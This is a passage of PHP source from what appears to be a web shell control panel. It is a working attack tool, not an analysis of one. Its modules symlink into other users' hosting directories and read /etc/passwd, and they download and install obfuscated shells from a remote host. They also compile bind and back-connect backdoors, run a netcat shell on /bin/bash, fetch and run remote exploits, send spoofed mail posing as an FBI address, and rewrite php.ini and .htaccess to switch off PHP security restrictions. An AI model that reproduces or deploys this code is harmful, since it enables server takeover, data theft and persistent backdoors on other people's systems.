1944echo "<br/><center>[Cms] : <span class='gaya'>Symlink With Cms Detector</span> <a href='?x=cms&do=detect' class='no'><button class='inputzbut'>Symlink</button></a><br/>";
1945if(($_GET['x'] == 'cms') && ($_GET['do'] == 'detect')){
1946if(!file_exists('tmp.tmp')){
1947@fopen('tmp.tmp', 'w');
1948echo "<br/><div class='sym'><table border='1' bordercolor='#333333' width='500' cellpadding='1' cellspacing='0'>";
1949echo "<thead><th>Domains</th><th>Users</th><th style='width:70px;padding:0px;'>Symlink</th></thead>";
1950$p = 0;
1951if(is_readable("/var/named")){
1952$list = scandir("/var/named");
1953$current_dir = posix_getcwd();
1954$dir = explode("/",$current_dir);
1955foreach($list as $domain){
1956if(strpos($domain,".db"))
1957{
1958$domain = str_replace('.db','',$domain);
1959$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1960error_reporting(0);
1961$link = $pageURL.'tmp/'.$owner['name'];
1962cms_add($link,$domain,$owner['name'],"WordPress");
1963cms_add($link,$domain,$owner['name'],"Joomla");
1964cms_add($link,$domain,$owner['name'],"vBulletin");
1965cms_add($link,$domain,$owner['name'],"WHMCS");
1966cms_add($link,$domain,$owner['name'],"PhpBB");
1967cms_add($link,$domain,$owner['name'],"MyBB");
1968cms_add($link,$domain,$owner['name'],"IPB");
1969cms_add($link,$domain,$owner['name'],"SMF");
1970cms_add($link,$domain,$owner['name'],"Drupal");
1971cms_add($link,$domain,$owner['name'],"e107");
1972cms_add($link,$domain,$owner['name'],"Seditio");
1973cms_add($link,$domain,$owner['name'],"osCommerce");
1974}
1975}
1976}
1977}else{
1978echo "<br/><div class='sym'><table border='1' bordercolor='#333333' width='500' cellpadding='1' cellspacing='0'>";
1979echo "<thead><th>Domains</th><th>Users</th><th style='width:70px;padding:0px;'>Symlink</th></thead>";
1980$content = file_get_contents($pageURL.'tmp.tmp');
1981echo $content;
1982}
1983echo "<tr><th colspan='3'><a href='".$pageURL."tmp' target='_blank' class='no'><button class='inputzbut'>View Symlink</button></a><a href='?x=cms&do=cancms' class='no'><button class='inputzbut'>Cancel Symlink</button></a></th></tr></table></div>";
1984}
1985if(($_GET['x'] == 'cms') && ($_GET['do'] == 'cancms')){
1986if(file_exists('tmp.tmp')){
1987@unlink('tmp.tmp');
1988@exe('rm -r tmp');
1989}
1990}
1991}
1992elseif(isset($_GET['x']) && ($_GET['x'] == 'port'))
1993{
1994echo "<br/><center>";
1995echo "[URL] : <a href='http://".$server_ip.":13123' target='_blank' class='gaya' id='aisi'>http://".$server_ip.":13123</a>";
1996echo '<form method="post"><table class="tabnet"><tr><th colspan="4">Symlink Port</th></tr><tr><td>Port : </td><td><input size="35" name="portname" type="numeric" value="13123" class="inputz" onkeypress="ganti()" id="portname" style="width:100;"></td><td><select name="pilihport" class="inputz"><option value="pl">Perl</option><option value="py">Python</option></select></td><td><input class="inputzbut" type="submit" name="symport" value="Symlink" /></td></tr></table></form>';
1997$np = $_POST['portname'];
1998if(isset($_POST['symport'])){
1999$ats = gzinflate(str_rot13(base64_decode('RknULy0u0kLKzNNCzStGKKgsycjP4+XKzC3ILypECAbSOakeISEBwalScqlSCIn85OzUEjTB/G9eLgA=')));
2000$bwh = gzinflate(str_rot13(base64_decode('co4xeMMwEIXnBvIfDi9JVZBqgacumU9VvAvFvmDRS0VB1yo/P5IwtNDxHve993o39g5NO7Og1n3fd70Y67Rh1Wnz4aMc58mSdbtpl++jZNMDCW242iU88DgM5yvSD5L8DS74/MbI62Kmc+YwFcaPX8jr//C5kk80zQGCJ94dYIXKSSDrSzQnn8AHZ8CzjRArAt5OwtuNfMoBGK44KHVgD5FW1LY/JfgyxUFORERdl0WSuSBNUzn6Uv3jqrKsePruCYt0zt8=')));
2001$pt = "port = ".$np;
2002$r = $ats.$pt.$bwh;
2003switch($_POST['pilihport']){
2004case 'pl':
2005$f = fopen('port.pl','w');
2006fwrite($f,$r);
2007echo "<span class='gaya'>[</span> <a href='http://".$server_ip.":".$np."' target='_blank'>DONE</a> <span class='gaya'>]</span>";
2008@exe('perl port.pl');
2009break;
2010case 'py':
2011$f = fopen('port.py','w');
2012fwrite($f,$r);
2013echo "<span class='gaya'>[</span> <a href='http://".$server_ip.":".$np."' target='_blank'>DONE</a> <span class='gaya'>]</span>";
2014@exe('python port.py');
2015break;
2016}
2017}
2018}
2019elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql'))
2020{
2021?>
2022<form action="?y=<?php echo $pwd; ?>&x=mysql" method="post">
2023<?php
2024echo "<br/><center>";
2025$sqlshell = file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/sql.php');
2026$file = fopen("sql.php" ,"w+");
2027$write = fwrite ($file ,gzinflate(base64_decode(str_rot13(strrev($sqlshell)))));
2028fclose($file);
2029chmod("sql.php",0644);
2030echo "<span class='normal'>[URL] :</span> <a href='".$alamat."/sql.php' target='_blank' class='link'>http://".$_SERVER['HTTP_HOST'].$alamat."/sql.php</a>";
2031if(isset($_POST['cansql'])) {
2032echo "<form action='' method='post'><input class='inputzbut' type='submit' value='Install' name='inssql'/></form>";
2033if(file_exists('sql.php')){
2034@unlink('sql.php');
2035}
2036}
2037else {
2038echo "<form action='' method='post'><input class='inputzbut' type='submit' value='Cancel' name='cansql'/></form>";
2039}
2040echo "<br/><br/><iframe src=".$alamat."/sql.php width=97% height=580px frameborder=0></iframe></center></form>";
2041}
2042elseif(isset($_GET['x']) && ($_GET['x'] == 'cpanel'))
2043{
2044?>
2045<form action="?y=<?php echo $pwd; ?>&x=cpanel" method="post">
2046<?php
2047echo "<br/><center>";
2048$cpshell = file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/cp.php');
2049$file = fopen("cp.php" ,"w+");
2050$write = fwrite ($file ,gzinflate(base64_decode(str_rot13(strrev($cpshell)))));
2051fclose($file);
2052chmod("cp.php",0644);
2053echo "<span class='normal'>[URL] :</span> <a href='".$alamat."/cp.php' target='_blank' class='link'>http://".$_SERVER['HTTP_HOST'].$alamat."/cp.php</a>";
2054if(isset($_POST['cancp'])) {
2055echo "<form action='' method='post'><input class='inputzbut' type='submit' value='Install' name='inscp'/></form>";
2056if(file_exists('cp.php')){
2057@unlink('cp.php');
2058}
2059}
2060else {
2061echo "<form action='' method='post'><input class='inputzbut' type='submit' value='Cancel' name='cancp'/></form>";
2062}
2063echo "<br/><br/><iframe src=".$alamat."/cp.php width=97% height=580px frameborder=0 style='overflow-y:hidden;'></iframe></center></form>";
2064}
2065elseif(isset($_GET['x']) && ($_GET['x'] == 'whmcs'))
2066{
2067?>
2068<form action="?y=<?php echo $pwd; ?>&x=whmcs" method="post">
2069<?php
2070echo "<br/><center>";
2071$whmshell = file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/whm.php');
2072$file = fopen("whm.php" ,"w+");
2073$write = fwrite ($file ,gzinflate(base64_decode(str_rot13(strrev($whmshell)))));
2074fclose($file);
2075chmod("whm.php",0644);
2076echo "<span class='normal'>[URL] :</span> <a href='".$alamat."/whm.php' target='_blank' class='link'>http://".$_SERVER['HTTP_HOST'].$alamat."/whm.php</a>";
2077if(isset($_POST['canwhm'])) {
2078echo "<form action='' method='post'><input class='inputzbut' type='submit' value='Install' name='inswhm'/></form>";
2079if(file_exists('whm.php')){
2080@unlink('whm.php');
2081}
2082}
2083else {
2084echo "<form action='' method='post'><input class='inputzbut' type='submit' value='Cancel' name='canwhm'/></form>";
2085}
2086echo "<br/><br/><iframe src=".$alamat."/whm.php width=97% height=575px frameborder=0 ></iframe></center></form>";
2087}
2088elseif(isset($_GET['x']) && ($_GET['x'] == 'ins'))
2089{
2090?>
2091<form action="?y=<?php echo $pwd; ?>&x=ins" method="post">
2092<?php
2093echo "<center>";
2094echo "
2095<form action='".$pwd."&x=ins' method='post'>
2096<table class='tabnet'>
2097<tr>
2098<th colspan='3'>Install Shell</th>
2099</tr>
2100<tr>
2101<td>Name Folder</td><td>:</td><td><input class='inputz' type='text' name='insdir' value='cgi-bin'/></td>
2102</tr>
2103<tr>
2104<td>Name Shell</td><td>:</td><td><input id='wow' class='inputz' type='text' name='insname' value='shell.pl'/>
2105</td>
2106</tr>
2107<tr>
2108<td>Type Shell</td><td>:</td><td><select id='options' class='inputz' name='ins' onchange='optionCheck()'>
2109<option value='pl'>Perl</option>
2110<option value='py'>Python</option>
2111<option value='asp'>ASP</option>
2112<option value='aspx'>ASPX</option>
2113<option value='jsp'>JSP</option>
2114</select></td>
2115</tr>
2116<tr>
2117<th colspan='3'><input class='inputzbut' type='submit' name='installz' value='install'/></th>
2118</tr>
2119</table>
2120</form> ";
2121$dirz = $_POST['insdir'];
2122$namez = $_POST['insname'];
2123$urlz = str_replace($_SERVER['DOCUMENT_ROOT'], "", @getcwd());
2124$met = "Options FollowSymLinks MultiViews Indexes ExecCGI
2125AddType application/x-httpd-cgi .cgi .jpg .gif .png .txt .zip .rar .tar .gz .pdf .doc .xls .htm .html .bin .sh .root .sys .pl .py
2126AddHandler cgi-script .cgi .jpg .gif .png .txt .zip .rar .tar .gz .pdf .doc .xls .htm .html .bin .sh .root .sys .pl .py
2127AddHandler cgi-script .cgi .jpg .gif .png .txt .zip .rar .tar .gz .pdf .doc .xls .htm .html .bin .sh .root .sys .pl .py";
2128if(isset($_POST['installz'])){
2129if($dirz != ''){
2130switch($_POST['ins']){
2131case 'pl':
2132mkdir($dirz, 0755);
2133chdir($dirz);
2134$tai = ".htaccess";
2135$sem = "$tai";
2136$sim = fopen ($sem , 'w') or die ("Error");
2137fwrite ( $sim , $met ) ;
2138fclose ($sim);
2139$cgiz = file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/shell.pl');
2140$cgi = fopen($namez,"w+");
2141$write = fwrite($cgi ,gzinflate(base64_decode(str_rot13(strrev($cgiz)))));
2142fclose($cgi);
2143chmod($namez,0755);
2144echo "<br/>Successfull Install <a href='".$urlz."/".$dirz."/".$namez."' target='_blank'><span class='gaya'>".$namez."</span></a>";
2145break;
2146case 'py':
2147mkdir($dirz, 0755);
2148chdir($dirz);
2149$tai = ".htaccess";
2150$sem = "$tai";
2151$sim = fopen ($sem , 'w') or die ("Error");
2152fwrite ( $sim , $met ) ;
2153fclose ($sim);
2154$cgiz = file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/shell.py');
2155$cgi = fopen($namez,"w+");
2156$write = fwrite($cgi ,gzinflate(base64_decode(str_rot13(strrev($cgiz)))));
2157fclose($cgi);
2158chmod($namez,0755);
2159echo "<br/>Successfull Install <a href='".$urlz."/".$dirz."/".$namez."' target='_blank'><span class='gaya'>".$namez."</span></a>";
2160break;
2161case 'asp':
2162mkdir($dirz, 0755);
2163chdir($dirz);
2164$aspxz = file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/shell.asp');
2165$aspx = fopen($namez,"w+");
2166$write = fwrite($aspx ,gzinflate(base64_decode(str_rot13(strrev($aspxz)))));
2167fclose($aspx);
2168chmod($namez,0755);
2169echo "<br/>Successfull Install <a href='".$urlz."/".$dirz."/".$namez."' target='_blank'><span class='gaya'>".$namez."</span></a>";
2170break;
2171case 'aspx':
2172mkdir($dirz, 0755);
2173chdir($dirz);
2174$aspxz = file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/shell.aspx');
2175$aspx = fopen($namez,"w+");
2176$write = fwrite($aspx ,gzinflate(base64_decode(str_rot13(strrev($aspxz)))));
2177fclose($aspx);
2178chmod($namez,0755);
2179echo "<br/>Successfull Install <a href='".$urlz."/".$dirz."/".$namez."' target='_blank'><span class='gaya'>".$namez."</span></a>";
2180break;
2181case 'jsp':
2182mkdir($dirz, 0755);
2183chdir($dirz);
2184$aspxz = file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/shell.jsp');
2185$aspx = fopen($namez,"w+");
2186$write = fwrite($aspx ,gzinflate(base64_decode(str_rot13(strrev($aspxz)))));
2187fclose($aspx);
2188chmod($namez,0755);
2189echo "<br/>Successfull Install <a href='".$urlz."/".$dirz."/".$namez."' target='_blank'><span class='gaya'>".$namez."</span></a>";
2190break;
2191}
2192}
2193else{
2194echo "<br/>Error Cannot Install <span class='guyu'>".$namez."</span>";
2195}
2196}
2197}
2198elseif(isset($_GET['view']) && ($_GET['view'] != "")){
2199if(is_file($_GET['view'])){
2200if(!isset($file)) $file = magicboom($_GET['view']);
2201if(!$win && $posix){
2202$name=@posix_getpwuid(@fileowner($folder));
2203$group=@posix_getgrgid(@filegroup($folder));
2204$owner = $name['name']." : ".$group['name'];
2205}
2206else {
2207$owner = $user;
2208}
2209$owner = $user;
2210$filn = basename($file); echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\"> <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span> <form action=\"?y=".$pwd."&view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".substr(sprintf('%o', fileperms($file)),-4)." | ".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\"?y=$pwd&edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$file\">delete</a> | <a href=\"?y=$pwd&dl=$file\">download</a> (<a href=\"?y=$pwd&dlgzip=$file\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\"?y=".$pwd."&view=".$file."\">text</a> | <a href=\"?y=".$pwd."&view=".$file."&type=code\">code</a> | <a href=\"?y=".$pwd."&view=".$file."&type=image\">image</a></td></tr> </table> "; if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "<div style=\"text-align:center;\"><img src=\"?y=".$pwd."&img=".$filn."\"></div>"; }
2211elseif(isset($_GET['type']) && ($_GET['type']=='code')){
2212echo "<div class=\"viewfile\">";
2213$file = wordwrap(@file_get_contents($file),"240","\n");
2214@highlight_string($file);
2215echo "</div>";
2216}
2217else {
2218echo "<div class=\"viewfile\">";
2219echo nl2br(htmlentities((@file_get_contents($file))));
2220echo "</div>";
2221}
2222}
2223elseif(is_dir($_GET['view'])){
2224echo showdir($pwd,$prompt);
2225}
2226}
2227elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){
2228if(isset($_POST['save'])){
2229$file = $_POST['saveas'];
2230$filed = basename($file);
2231$content = magicboom($_POST['content']);
2232$cp_file = $_POST['cp_file'];
2233if($filez = @fopen($file,"w")){
2234$time = date("d-M-Y H:i",time());
2235if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time;
2236else $msg = "failed to save";
2237@fclose($filez);
2238if(isset($cp_file)){
2239$dir_open = opendir('.');
2240while(false !== ($filename = readdir($dir_open))){
2241if($filename != "." && $filename != ".."){
2242if(is_dir($filename)){
2243$link = $filename;
2244copy($file, $pwd.$link."/".$filed);
2245}
2246}
2247}
2248closedir($dir_open);
2249}
2250}
2251else $msg = "permission denied";
2252}
2253if(!isset($file)) $file = $_GET['edit'];
2254if($filez = @fopen($file,"r")){
2255$content = "";
2256while(!feof($filez)){
2257$content .= htmlentities(str_replace("''","'",fgets($filez)));
2258}
2259@fclose($filez);
2260}
2261?>
2262<form action="?y=<?php echo $pwd; ?>&edit=<?php echo $file; ?>" method="post"><br/><table class="cmdbox"><tr><td colspan="2"><textarea class="output" name="content"><?php echo $content; ?></textarea><tr><td colspan="2">Save As <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:40%;" value="<?php echo $file; ?>" /> <input type="checkbox" name="cp_file" /> Copy To All Sub Directories <input class="inputzbut" type="submit" value="Save !" name="save" /> <?php echo $msg; ?></td></tr></table></form>
2263<?php
2264}
2265elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){
2266if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) {
2267$port = trim($_POST['port']);
2268$passwrd = trim($_POST['bind_pass']);
2269tulis("bdc.c",$port_bind_bd_c);
2270exe("gcc -o bdc bdc.c");
2271exe("chmod 777 bdc");
2272@unlink("bdc.c");
2273exe("./bdc ".$port." ".$passwrd." &");
2274$scan = exe("ps aux");
2275if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
2276else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }
2277}
2278elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) {
2279$port = trim($_POST['port']);
2280$passwrd = trim($_POST['bind_pass']);
2281tulis("bdp",$port_bind_bd_pl);
2282exe("chmod 777 bdp");
2283$p2=which("perl");
2284exe($p2." bdp ".$port." &");
2285$scan = exe("ps aux");
2286if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
2287else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }
2288}
2289elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) {
2290$ip = trim($_POST['ip']);
2291$port = trim($_POST['backport']);
2292tulis("bcc.c",$back_connect_c);
2293exe("gcc -o bcc bcc.c");
2294exe("chmod 777 bcc");
2295@unlink("bcc.c");
2296exe("./bcc ".$ip." ".$port." &");
2297$msg = "Now script try connect to ".$ip." port ".$port." ...";
2298}
2299elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) {
2300$ip = trim($_POST['ip']);
2301$port = trim($_POST['backport']);
2302tulis("bcp",$back_connect);
2303exe("chmod +x bcp");
2304$p2=which("perl");
2305exe($p2." bcp ".$ip." ".$port." &");
2306$msg = "Now script try connect to ".$ip." port ".$port." ...";
2307}
2308elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd']))
2309{
2310$pilihan = trim($_POST['pilihan']);
2311$wurl = trim($_POST['wurl']);
2312$namafile = download($pilihan,$wurl);
2313if(is_file($namafile)) {
2314$msg = exe($wcmd);
2315}
2316else $msg = "error: file not found $namafile";
2317}
2318?>
2319<table class="tabnet">
2320<tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr>
2321<tr>
2322<td>
2323<table>
2324<form method="post" action="?y=<?php echo $pwd; ?>&x=netsploit">
2325<tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr>
2326<tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr>
2327<tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
2328<input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form>
2329</table>
2330</td>
2331<td>
2332<table>
2333<form method="post" action="?y=<?php echo $pwd; ?>&x=netsploit">
2334<tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr>
2335<tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr>
2336<tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
2337<input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form>
2338</table>
2339</td>
2340<td>
2341<table>
2342<form method="post" action="?y=<?php echo $pwd; ?>&x=netsploit">
2343<tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>
2344<tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>
2345</tr>
2346<tr><td><select size="1" class="inputz" name="pilihan">
2347<option value="wwget">wget</option>
2348<option value="wlynx">lynx</option>
2349<option value="wfread">fread</option>
2350<option value="wfetch">fetch</option>
2351<option value="wlinks">links</option>
2352<option value="wget">GET</option>
2353<option value="wcurl">curl</option>
2354</select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form>
2355</table>
2356</td>
2357</tr>
2358</table>
2359<form action="" method="post">
2360<table class="tabnet" align="center">
2361<tr>
2362<td style="padding-left:3;">Netcat $ <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:629px;"value="./nc -vv -l -p 6969 -e /bin/bash" /></td>
2363<?php
2364if(isset($_POST['submitcmd'])) {
2365if(!file_exists('nc')){
2366@exe('wget http://syntax-errorz.googlecode.com/svn/trunk/nc');
2367}
2368@exe('chmod 777 nc');
2369@exe($_POST['cmd']);
2370echo '<td><input class="inputzbut" type="submit" value="Stops !" name="cancelcmd" style="width:80px;" /></td>';
2371}
2372else {
2373echo '<td><input class="inputzbut" type="submit" value="Start !" name="submitcmd" style="width:80px;" /></td>';
2374}
2375if(isset($_POST['cancelcmd'])) {
2376if(file_exists('nc')){
2377@unlink('nc');
2378}
2379}
2380?>
2381</tr></table></form>
2382<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
2383<?php
2384}
2385elseif(isset($_GET['x']) && ($_GET['x'] == 'mail')){
2386if(isset($_POST['mail_send'])){
2387$mail_to = $_POST['mail_to'];
2388$mail_from = $_POST['mail_from'];
2389$mail_subject = $_POST['mail_subject'];
2390$mail_content = magicboom($_POST['mail_content']);
2391if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){
2392$msg = "[Mail] : <span class='gaya'>Success Sent To</span> $mail_to";
2393}
2394else $msg = "[Mail] : <span class='guyu'>Send Failed</span>";
2395}
2396?>
2397<br/>
2398<form action="?y=<?php echo $pwd; ?>&x=mail" method="post">
2399<textarea class="output" name="mail_content" id="cmd" style="height:280px;">Hey there, please patch me ! </textarea>
2400<table class="cmdbox" width="20%">
2401<tr><td>Mail To : <input class="inputz" style="width:20%;" type="text" value="<?php echo $admin_id; ?>" name="mail_to" /></td></tr>
2402<tr><td>From : <input class="inputz" style="width:20%;" type="text" value="<?php echo $xName."@fbi.gov"; ?>" name="mail_from" /></td></tr>
2403<tr><td>Subject : <input class="inputz" style="width:20%;" type="text" value="Patch Your System" name="mail_subject" /></td></tr>
2404<tr><td><input style="width:23%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr>
2405<tr><td><?php echo $msg; ?></td></tr>
2406</table>
2407</form>
2408<?php
2409}
2410elseif(isset($_GET['x']) && ($_GET['x'] == 'bypass'))
2411{
2412?>
2413<form action="?y=<?php echo $pwd; ?>&x=bypass" method="post">
2414<input name="matikan" type="hidden" value="sekatan">
2415<?php
2416if(($safemode=='0') && '' == ($func=@ini_get('disable_functions'))){
2417echo "<br/><center>[Bypass] : <span class='gaya'>Safemode And Disable Function Was Successfull</span>
2418</center>";
2419}else{
2420echo "<br/><center>[Bypass] : <span class='gaya'>Safemode And Disable Function With</span>
2421<select class='inputzbut' name='type'>
2422<option value='1'>php.ini</option>
2423<option value='2'>.htaccess</option>
2424<option value='3'>Both</option>
2425</select>
2426<input class='inputzbut' type='submit' value='Go !'/>
2427</center>";
2428}
2429?>
2430</form>
2431<?php
2432if($_POST['matikan']=='sekatan'){
2433@error_reporting(0);
2434$phpini = 'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==';
2435$htaccess = 'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==';
2436if($_POST['type']=='1'){
2437$file = fopen("php.ini","w+");
2438$write = fwrite ($file ,base64_decode($phpini));
2439fclose($file);
2440}
2441if($_POST['type']=='2'){
2442$file = fopen(".htaccess","w+");
2443$write = fwrite ($file ,base64_decode($htaccess));
2444fclose($file);
2445}
2446if($_POST['type']=='3'){
2447$file1 = fopen("php.ini","w+");
2448$write1 = fwrite ($file1 ,base64_decode($phpini));
2449fclose($file1);
2450$file2 = fopen(".htaccess","w+");
2451$write2 = fwrite ($file2 ,base64_decode($htaccess));
2452fclose($file2);
2453}
2454echo "<center><span class='gaya'>[</span> <a href=".$_SERVER['PHP_SELF'].">DONE</a> <span class='gaya'>]</span></center>";
2455}
2456}
2457elseif(isset($_GET['x']) && ($_GET['x'] == 'logout'))
2458{
2459?>
2460<form action="?y=<?php echo $pwd; ?>&x=logout" method="post">
2461<?php
2462unset($_SESSION[S4MP4H_Crypt($_SERVER['HTTP_HOST'])]);
2463echo '<br/><center>Logout Successfull</center>';
2464}
2465elseif(isset($_GET['x']) && ($_GET['x'] == 'symlinkss'))
2466{
2467?>
2468<form action="?y=<?php echo $pwd; ?>&x=symlinkss" method="post">
2469<?php
2470@set_time_limit(0);
2471echo "<center><div>";
2472if(isset($_POST['submitcmd'])) {
2473$r = stripcslashes($_POST['file']);
2474if(file_exists('passwd.txt')or !file_exists('passwd.txt')){
2475$f = @fopen('passwd.txt','w+');
2476$w = @fwrite($f,$r);
2477fclose($f);
2478}
2479}
2480if(isset($_POST['dellpass'])) {
2481if(file_exists('passwd.txt')){
2482@unlink('passwd.txt');
2483@unlink('sym/.htaccess');
2484@unlink('sym/root');
2485@rmdir('sym');
2486}
2487}
2488if($w or @filesize('passwd.txt') > 0){
2489echo "<br/><center><div>[Symlink] : <span class='gaya'>Try Read -> [ /etc/passwd ]</span> <form action='' method='post'><input class='inputzbut' type='submit' value='Cancel' name='dellpass'/></form></center>";
2490echo "<br/><div class='sym'><table border='1' bordercolor='#333333' width='500' cellpadding='1' cellspacing='0' class='sortable'><thead><th style='width:40px;padding:0px;'>No</th><th style='width:50px;padding:0px;'>Users</th><th>Path</th><th style='width:50px;padding:0px;'>Symlink</th></thead><tbody>";
2491$fil3 = file('passwd.txt');
2492$pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].$alamat;
2493$total = 0;
2494$no = 1;
2495foreach ($fil3 as $f){
2496$u=explode(':', $f);
2497$user = $u['0'];
2498$homeuser = $u['5'];
2499echo "
2500<tr>
2501<td align='center'>".$no++."</td>
2502<td>
2503$user
2504</td>
2505<td align='left'>
2506<a href='$alamat/sym/root$homeuser/' target='_blank' class='gaya'>$homeuser/</a>
2507</td>
2508<td align='center'>
2509<a href='$alamat/sym/root$homeuser/' target='_blank' class='gaya'>Symlink</a>
2510</td>
2511</tr>";
2512$total++;
2513}
2514echo "</tbody><tfoot><th>Totals</th><th colspan='3'>Founded ".$total." Users For Symlink</th></tfoot></table></div>";
2515}
2516else {
2517if(isset($_POST['sympass'])) {
2518@mkdir('sym',0755);
2519$htaccess = "Options all \n DirectoryIndex syntax.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
2520$write =@fopen ('sym/.htaccess','w');
2521fwrite($write ,$htaccess);
2522@symlink('/','sym/root');
2523echo "<br/><center><div>[Symlink] : <span class='gaya'>Try Read -> [ /etc/passwd ]</span> <form action='' method='post'><input class='inputzbut' type='submit' value='Cancel' name='symcan'/></form></center>";
2524echo "<br/><form method='post' action=''><textarea width='500' rows='10' name='file' class='outputz'>";
2525flush();
2526$file = '/etc/passwd';
2527$r3ad = @fopen($file, 'r');
2528if ($r3ad){
2529$content = @fread($r3ad, @filesize($file));
2530echo "".htmlentities($content)."";
2531}
2532elseif(!$r3ad)
2533{
2534$r3ad = @show_source($file) ;
2535echo "Can't Read -> [ /etc/passwd ]";
2536}
2537elseif(!$r3ad)
2538{
2539$r3ad = @highlight_file($file);
2540}
2541elseif(!$r3ad)
2542{
2543 for($uid=0;$uid<1000;$uid++){
2544$ara = posix_getpwuid($uid);
2545if (!empty($ara)) {
2546while (list ($key, $val) = each($ara)){
2547print "$val:";
2548}
2549print "\n";
2550}
2551}
2552}
2553flush();
2554echo "</textarea><br /><br /><input type='submit' value='Symlink' name='submitcmd' class='inputzbut'/></form>";
2555}
2556else {
2557if(isset($_POST['symcan'])) {
2558@unlink('sym/.htaccess');
2559@unlink('sym/root');
2560@rmdir('sym');
2561echo "<br/><center><div>[Symlink] : <span class='gaya'>Try Read -> [ /etc/passwd ]</span> <form action='' method='post'><input class='inputzbut' type='submit' value='Symlink' name='sympass'/></form></center>";
2562}
2563else {
2564echo "<br/><center><div>[Symlink] : <span class='gaya'>Try Read -> [ /etc/passwd ]</span> <form action='' method='post'><input class='inputzbut' type='submit' value='Symlink' name='sympass'/></form></center>";
2565}
2566}
2567}
2568}
2569elseif(isset($_GET['x']) && ($_GET['x'] == 'symlinks'))
2570{
2571?>
2572<form action="?y=<?php echo $pwd; ?>&x=symlinks" method="post">
2573<?php
2574@set_time_limit(0);
2575echo "<center><div>";
2576if(isset($_POST['submitcmd'])) {
2577$r = stripcslashes($_POST['file']);
2578if(file_exists('passwd.txt')or !file_exists('passwd.txt')){
2579$f = @fopen('passwd.txt','w+');
